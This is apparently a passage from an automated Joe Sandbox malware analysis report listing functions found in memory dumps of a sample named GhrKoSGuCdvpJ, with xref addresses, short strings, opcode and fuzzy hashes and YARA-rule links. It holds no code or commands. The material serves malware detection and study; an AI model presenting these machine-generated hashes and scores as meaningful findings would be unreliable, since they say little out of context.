Instruction Fuzzy Hash: D8819074E01218CFEB14CFAAD944BDDBBB2BF88300F14806AE419AB365DB749981CF50

Function 056BD2C8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PHq, xrefs: 056BD51F
PHq, xrefs: 056BD530

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 5c2644a5b3f927b159d2734940351de0e63b28de9348406c956e00c5a1c16618
Instruction ID: 43cef013b349741e5fdf8d190f809cdd056247810b8b84a6a1bf27f8c9de0d92
Opcode Fuzzy Hash: 5c2644a5b3f927b159d2734940351de0e63b28de9348406c956e00c5a1c16618
Instruction Fuzzy Hash: 8D819274E00218CFEB14CFAAD884B9DBBF2BF89310F14816AD419AB365DB749985CF51

Function 056BCA58 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

PHq, xrefs: 056BCCAF
PHq, xrefs: 056BCCC0

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 6963dca576d195643bc047b328b8e00f7b5d57d4037952385adefaf53c8a3acf
Instruction ID: 29feb6565520213dec7498eaa96e7aab850779e7012f755d94fb4bc14fad3c8c
Opcode Fuzzy Hash: 6963dca576d195643bc047b328b8e00f7b5d57d4037952385adefaf53c8a3acf
Instruction Fuzzy Hash: 5A819474E00219CFEB14DFAAD944A9DBBF2BF89300F14C06AE819AB365DB745981CF50

Function 056BC788 Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

PHq, xrefs: 056BC9F0
PHq, xrefs: 056BC9DF

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: deb89c2e0de942ca5ff6ad6b35d56bc5633298183e13d05f7f87027413f7ce61
Instruction ID: cf7e57b01982f8528e1cfafd9d37012a32863142c52ec737be5bd5a609db351c
Opcode Fuzzy Hash: deb89c2e0de942ca5ff6ad6b35d56bc5633298183e13d05f7f87027413f7ce61
Instruction Fuzzy Hash: 1A61C674E002198FEB54DFAAD844A9DBBF2BF89310F14C06AE819AB365DB745981CF50

Function 070397B0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3746610010.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7030000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a64816309f301b919f10e79850b922461db00514dec1a54a6a4a6d91e75de998
Instruction ID: eb7d6eedd82ce9526b339b1d72ce8734b85e237bbbc5eee48be0ae515022ae6b
Opcode Fuzzy Hash: a64816309f301b919f10e79850b922461db00514dec1a54a6a4a6d91e75de998
Instruction Fuzzy Hash: D5F116B4E10218CFDB14CFA9D884B9DFBB6BF84304F1482AAD448AB355DB74A985CF50

Function 056BF150 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

u, xrefs: 056BF154

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-4067256894
Opcode ID: 7086336939ae69c4052b03938cfb3a15366d71cee3d3ba8abfdad4f49ce59ace
Instruction ID: 63f5c89dfebd7c2dd0804daa1235f0e1f5f85c3ceea1ee2dea0c1b13116c1930
Opcode Fuzzy Hash: 7086336939ae69c4052b03938cfb3a15366d71cee3d3ba8abfdad4f49ce59ace
Instruction Fuzzy Hash: D0510774E01218DBEB14DFA9D8487EDF7B2FB89300F648129D405BB2A4D7B59981CF54

Function 056BEC18 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd47bf713c2ef2874ae0ba720fb0bc1cfb3ee244515e50e0749159a2790f932d
Instruction ID: 635187f81c2319b715a9241b302ff5afffd776b5dfb71dec619e5f3b2ce2f0ac
Opcode Fuzzy Hash: fd47bf713c2ef2874ae0ba720fb0bc1cfb3ee244515e50e0749159a2790f932d
Instruction Fuzzy Hash: 32519674E00218DFEB18DFAAD454A9DBBB2FF89300F24812AE815AB764DB759845CF50

Function 056BF33C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55093f943e403024f7a1144cac734c552423d91995582d742d599c965a4c5881
Instruction ID: 2636a4acd8ad143fce692f24bddd260f0b984c34a279e59d5dda7c88230f364a
Opcode Fuzzy Hash: 55093f943e403024f7a1144cac734c552423d91995582d742d599c965a4c5881
Instruction Fuzzy Hash: 9C510474E05218CFEB14DFA8D888BEDF7B2FB49305F608229D415AB2A4C7B59981CF54

Function 056BEC0B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a76f739d5989a0355702e99f85c16d1378a028e47a9ae3c338026eaf8b017fcf
Instruction ID: 757870369181698b4cb3e3d2240a03c229e7c8d977ec32c92a852e2b0060443c
Opcode Fuzzy Hash: a76f739d5989a0355702e99f85c16d1378a028e47a9ae3c338026eaf8b017fcf
Instruction Fuzzy Hash: 1651A674E00218DFEB18DFA6D844ADDBBB2FF89300F24812AE815AB765DB759845CF00

Function 056B86AE Relevance: 6.6, Strings: 5, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 056B89A0
(oq, xrefs: 056B8A0F
,q, xrefs: 056B8990
(oq, xrefs: 056B89FF
(oq, xrefs: 056B86B2

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$,q$,q
API String ID: 0-189141485
Opcode ID: 9e2ef6570f05ed25e97b44fda58c535da2bf05b759b8635068cd44c03b57a0b1
Instruction ID: eed10704f2a455163418d1eb4c08a1c9bf072f0238f43e00929456a84d6684fb
Opcode Fuzzy Hash: 9e2ef6570f05ed25e97b44fda58c535da2bf05b759b8635068cd44c03b57a0b1
Instruction Fuzzy Hash: 86D15C71A00208DFEB25DF68C484AEDBBF6BF48314F148569E45AAB761DB70ED81CB50

Function 056B8E88 Relevance: 3.2, Strings: 2, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 056B9AA9
4'q, xrefs: 056B9ACF

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 36ff234042b88216cbc6350bef7e5d0e7ca3a0117670ecaa34f7b487d3aa1c5b
Instruction ID: f68aa18ca65bc772096f314807d41ee04af7b5a5892e1f05242c6d9a43bf532f
Opcode Fuzzy Hash: 36ff234042b88216cbc6350bef7e5d0e7ca3a0117670ecaa34f7b487d3aa1c5b
Instruction Fuzzy Hash: 4E524E74A00318CFEB259FA4C860B9EBB72FF95300F1080AEC64A6B764DA759D85DF51

Function 056B6930 Relevance: 2.8, Strings: 2, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 056B6A4E
Hq, xrefs: 056B6A1B

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 14591d210fa60d05beb1f793c7456e6c807203030dc7fa8f54cc8d614f1f6b16
Instruction ID: 6858f322c636d8a483cbc035027093ec0adb6d6b5cf45f877d85e82ac67571c9
Opcode Fuzzy Hash: 14591d210fa60d05beb1f793c7456e6c807203030dc7fa8f54cc8d614f1f6b16
Instruction Fuzzy Hash: F8B1BB707042118FEB259F28C854BBA7BB2FB89310F188569E946CB791DFB5CC82D791

Function 056B6E90 Relevance: 2.7, Strings: 2, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 056B6F70
,q, xrefs: 056B6F66

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 66f455b89fd182fb3a77e69ac9a2d7f4124218e7d183b1db2571b9cf8384b8df
Instruction ID: 2e0b62d7aef4057f49e023836aed57872e3aae32ba62397cac5000d5ada75c50
Opcode Fuzzy Hash: 66f455b89fd182fb3a77e69ac9a2d7f4124218e7d183b1db2571b9cf8384b8df
Instruction Fuzzy Hash: B8819F74B04505CFEB14CF69C884AAEB7B2FFC9205B1481AAD406E7760DB71EC81CBA1

Function 056B3CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xq, xrefs: 056B3CCD
Xq, xrefs: 056B3CF6

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: 4231116365324c77c1c5ead5e371a6f2fa02d65940a852e44571cca75abdf893
Instruction ID: 838649aed81acd5ae6580a67a41e71fd90a1acfa91e4f2d5292a6d8371aa28bc
Opcode Fuzzy Hash: 4231116365324c77c1c5ead5e371a6f2fa02d65940a852e44571cca75abdf893
Instruction Fuzzy Hash: 82319231B0432587FF284AA999953BEA5ABBBC4211F584839D807C7790DBF5CC85C7A1

Function 056B98F0 Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

$q, xrefs: 056B99AC
$q, xrefs: 056B99CF

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: bc36c2956a6e26cc0e1db69fa282096a7d573ac886cbcbfa18e05dfa23060925
Instruction ID: f9ec548affe0c110b6c6838d28f9e4fa1d300ec76ee58759bd3c07a22ae6ce7e
Opcode Fuzzy Hash: bc36c2956a6e26cc0e1db69fa282096a7d573ac886cbcbfa18e05dfa23060925
Instruction Fuzzy Hash: 5F31F0703082518FEB69EB68C891ABD7B66BF8170071C445AE292DBB92DEA1CCC0C751

Function 056B0C8F Relevance: 1.8, Strings: 1, Instructions: 547COMMON

Download Yara Rule

Strings

LRq, xrefs: 056B0F19

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 12993964b9b4e73d41328da07f2c7db68f6f9479fca7bf1f45e1e919af05ce02
Instruction ID: d12172a4a4c875d6a34cda7fbc043ca781e14efffc6b379fc2154a5c3cae2578
Opcode Fuzzy Hash: 12993964b9b4e73d41328da07f2c7db68f6f9479fca7bf1f45e1e919af05ce02
Instruction Fuzzy Hash: 3652CA74A10219CFCB54DF28ED98B9DBBB2FB89302F1081A5D80AA7354DB745E81CF95

Function 056B0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRq, xrefs: 056B0F19

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: a82d94e2db01e1ffd670a6b4d34e39d908301040d64afb2f0183de8554840f50
Instruction ID: 70c4d13c9f54ba6b469375846c3d7daaf158d227ebae9ac829cfa7f62d35b8aa
Opcode Fuzzy Hash: a82d94e2db01e1ffd670a6b4d34e39d908301040d64afb2f0183de8554840f50
Instruction Fuzzy Hash: 0652B974A10219CFCB54DF28ED98B9DBBB2FB89302F1081A9D40AA7354DB745E81CF95

Function 07039B94 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 07039CD6

Memory Dump Source

Source File: 00000014.00000002.3746610010.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7030000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 581447352e90f0d6badf9cb1ba22b719fb63b3fd50c5ac1b9b18ab0a5d8b7930
Instruction ID: 4396e3cbf18be2f72ecdea807c33a97c274154eacb8698b399eb1cfde261c693
Opcode Fuzzy Hash: 581447352e90f0d6badf9cb1ba22b719fb63b3fd50c5ac1b9b18ab0a5d8b7930
Instruction Fuzzy Hash: BE1172B4E202198FDB04DFA8D484AEDB7F9FB88318F548255E858E7241D774A941CF54

Function 056BB8E3 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

(oq, xrefs: 056BBA69

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: 6ef121c3a8860005298a217fbf2353181bf90499d8bc6bc0d247c9abf79d9e31
Instruction ID: 951ec9bcdb3361982f4bfd587bbd03d1f4decd6908ac04a4f6d38f72d16b6738
Opcode Fuzzy Hash: 6ef121c3a8860005298a217fbf2353181bf90499d8bc6bc0d247c9abf79d9e31
Instruction Fuzzy Hash: C941F271B042049FDB15AB79D815BAE7BF6FFC8250F18806AE906D73A0CE709C42C7A4

Function 056B7DC8 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

(oq, xrefs: 056B833D

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: c3e1480c120e6151174a63074322effc2fa12986e7df010e1e910d3b0f344d3d
Instruction ID: c8833591a83bce7e8b322f93300fa6d5f96c64e98a894b6f60ebcea7552e2141
Opcode Fuzzy Hash: c3e1480c120e6151174a63074322effc2fa12986e7df010e1e910d3b0f344d3d
Instruction Fuzzy Hash: C941D131A002099FEB15CF64D844BAA7BB6FF84310F04846AE8158B751D7B5ED86DBA0

Function 056BE287 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fe25beed8f13ee2c1660d14f9e64e650998af140f59a10f0dcbd08d782c355
Instruction ID: aeac6deef41fdd7b38e7969ebc9adba40cae7f9a2b06476c5af14bea49547778
Opcode Fuzzy Hash: 80fe25beed8f13ee2c1660d14f9e64e650998af140f59a10f0dcbd08d782c355
Instruction Fuzzy Hash: B522A4740313528FE7546F38AAAE56ABE69FB4F363744EC11FC4B85045DF700489AB2A

Function 056BE2A8 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9ea3c75e5cf18bb8abe3c1837b3e74a7565e3951a2d21af3ff4a30ac9b841f
Instruction ID: bda71bc139a9780f0abf5c5df2769a691d166a0772fbfb740a97eb12477d17f9
Opcode Fuzzy Hash: 2b9ea3c75e5cf18bb8abe3c1837b3e74a7565e3951a2d21af3ff4a30ac9b841f
Instruction Fuzzy Hash: C31294740313528FA7546F38AAAE52EBE69FB4F363344EC11FC4B85044DF700589AB2A

Function 056BBAA8 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22dceb01b42ffaecc834c944b72ffcecef70a8ee5be351ec8332100ea150ba7b
Instruction ID: b3d6bc9726eaaa6bc5ae45bc109b96704d12656688d10acbc83faa155b04ab7f
Opcode Fuzzy Hash: 22dceb01b42ffaecc834c944b72ffcecef70a8ee5be351ec8332100ea150ba7b
Instruction Fuzzy Hash: A0F11C75A00614CFDB04CF69D888AADBBF6FF88350B158099E515AB371CB75EC82CB54

Function 056B8AD0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f9ee4c16acc3308a151ad943c86344e012550f4cee6f1a750153e7ce29744a
Instruction ID: a7b207825d1b373df480346a28e91ed4de69ad77cd35d6782748509c8353e645
Opcode Fuzzy Hash: b0f9ee4c16acc3308a151ad943c86344e012550f4cee6f1a750153e7ce29744a
Instruction Fuzzy Hash: D57129747442058FEB15DF28C895EAA7BFABF49340B1540A9E916CB771DBB0DC82CB90

Function 056BF5AF Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e77f91f17715a84fcfc834915431916531b451f1be2e068219049186a78f3a
Instruction ID: 4b7e7ebf39cabbdacaddda5089fc387092b9ac3461bf4f13792b435b2ff25c3e
Opcode Fuzzy Hash: 72e77f91f17715a84fcfc834915431916531b451f1be2e068219049186a78f3a
Instruction Fuzzy Hash: F061E074D01318DBEB14DFA9D888BADBBB2FF89300F608529D805AB254DB759A85CF40

Function 056BD869 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98936b7a8ad79b333e838a903a5b4e6426a56a3bb8ddda2523b66e18bfc4911c
Instruction ID: a8b0c0de18c275bcde8fc5be625489f40ef1db33ad27d2ac7df79b2786faf7be
Opcode Fuzzy Hash: 98936b7a8ad79b333e838a903a5b4e6426a56a3bb8ddda2523b66e18bfc4911c
Instruction Fuzzy Hash: DE519574E012189FDB54DFA9D984ADDBBF2FF89300F24916AE819AB365DB309941CF40

Function 056B41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36444528777c1b6b44a3969a310e868a6e0a6488693d521e3e2e99003633750a
Instruction ID: 35195ad96bc1b1ff8fa53cba35b9b309793cd74aa1f49f1cecc5abe92de31d56
Opcode Fuzzy Hash: 36444528777c1b6b44a3969a310e868a6e0a6488693d521e3e2e99003633750a
Instruction Fuzzy Hash: E7517074E01208CFDB48DFA9E59499DBBF2FF89301B209169E805AB324DB35AC42CF54

Function 056BACF3 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b170c2e361eb5dcd34d22197b37f298e828cfa11d6e62e834e918f9083cd84c5
Instruction ID: b6424dc6721a1a20aed88193d250cdf9f481ee6b4716f04adbe79b76eff6db4d
Opcode Fuzzy Hash: b170c2e361eb5dcd34d22197b37f298e828cfa11d6e62e834e918f9083cd84c5
Instruction Fuzzy Hash: 41417C31A04249DFEF11CFE8C844AEEBBB2FF45311F048156E905AB261D7B1E995DB90

Function 056B6050 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b1a4c686d432051475bb339d69abf8f8186d530e55a8adee55711e0fb33ac25
Instruction ID: b26b1c61f51b97687501fc4a31928c14cb2a9ceaf4c2b08fb812393fb52ed2f3
Opcode Fuzzy Hash: 8b1a4c686d432051475bb339d69abf8f8186d530e55a8adee55711e0fb33ac25
Instruction Fuzzy Hash: D0315E3170420AAFDF019F69D844AAE7BB6FB58341F008029FA0987355CB75D9A2DBA5

Function 056B5FF0 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15347b4ca5e33fcf44b94d97d73347e4ddcca3dc694d0e1e33702dab1511e2f5
Instruction ID: 3e1e8a5b3490cedc4af2721be719331401ca42db585f7840135faeb8a88b66cd
Opcode Fuzzy Hash: 15347b4ca5e33fcf44b94d97d73347e4ddcca3dc694d0e1e33702dab1511e2f5
Instruction Fuzzy Hash: 6A3129726093848FEB029F28D4207E53F72FF66210F4440DBD445CB392D675C99AC7A6

Function 056B8D69 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8fede13b73924ced99bbf2f47464fcdf3f6375468ed213c81ef09b526bb8af
Instruction ID: 634a3b7b00a43d1a86190a25dcc855ef35ad9a7862e116e04b80e035591889a5
Opcode Fuzzy Hash: 4b8fede13b73924ced99bbf2f47464fcdf3f6375468ed213c81ef09b526bb8af
Instruction Fuzzy Hash: 862148353046104FEB251A398465ABD3A6FBFD5600B18803AD602CB7A5EEA6CC83E391

Function 056B2790 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f07a9bf991ce288b9155e426980fa1c67828445ca2e51c81a92ee4f4890335de
Instruction ID: 6a7d01983cbd394c5e9abc76f49b40a8faf701d826036bfc3fcd5c5c04a5582b
Opcode Fuzzy Hash: f07a9bf991ce288b9155e426980fa1c67828445ca2e51c81a92ee4f4890335de
Instruction Fuzzy Hash: 3C317C74D153098FDB44DFA8D8556EEBBF1FF4A300F10816AD905B7221EB740985CB96

Function 056B8D78 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2976d8949e57c0207d27fb57fb457f0004d74d4dbea8ef6afe32e0da6cdac39
Instruction ID: 1a4fb1307200aeeb82c979175fdcbc52653e62cfe3d5880b609d3c2de5375f0b
Opcode Fuzzy Hash: c2976d8949e57c0207d27fb57fb457f0004d74d4dbea8ef6afe32e0da6cdac39
Instruction Fuzzy Hash: 0221B0313046104BFB256629C4657BE3A9FBFC8645F188039D602CB798DEB6CC83E785

Function 056BBA97 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ab1c329b54cac4bd84bef523c747d4a107f876e2bffe75c4d4a7c09317f7f3
Instruction ID: 7f57616b4ef6427c24cbb31b7d310fe2cba0204f1aa7b0e2f7c92f41254d731c
Opcode Fuzzy Hash: 36ab1c329b54cac4bd84bef523c747d4a107f876e2bffe75c4d4a7c09317f7f3
Instruction Fuzzy Hash: 79317071A006058FDB14CF68C889AAEBBB6FF84310B19C159E515AB3B5CF74ED42CB94

Function 056B6CE8 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e76b2059cd9df78cebd1e9fe3e7923fa2a3504fe0696665aadf71956cf78f5
Instruction ID: 9f73a8835fc04c85de782dc15b3460df2a45af07d8d3ca4a5ae3bed445bbccc8
Opcode Fuzzy Hash: e9e76b2059cd9df78cebd1e9fe3e7923fa2a3504fe0696665aadf71956cf78f5
Instruction Fuzzy Hash: 8921D335704A219FD7258B29D454A7E7BA2FF89751709817EE90ACB794CFB0CC42CB80

Function 056B28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

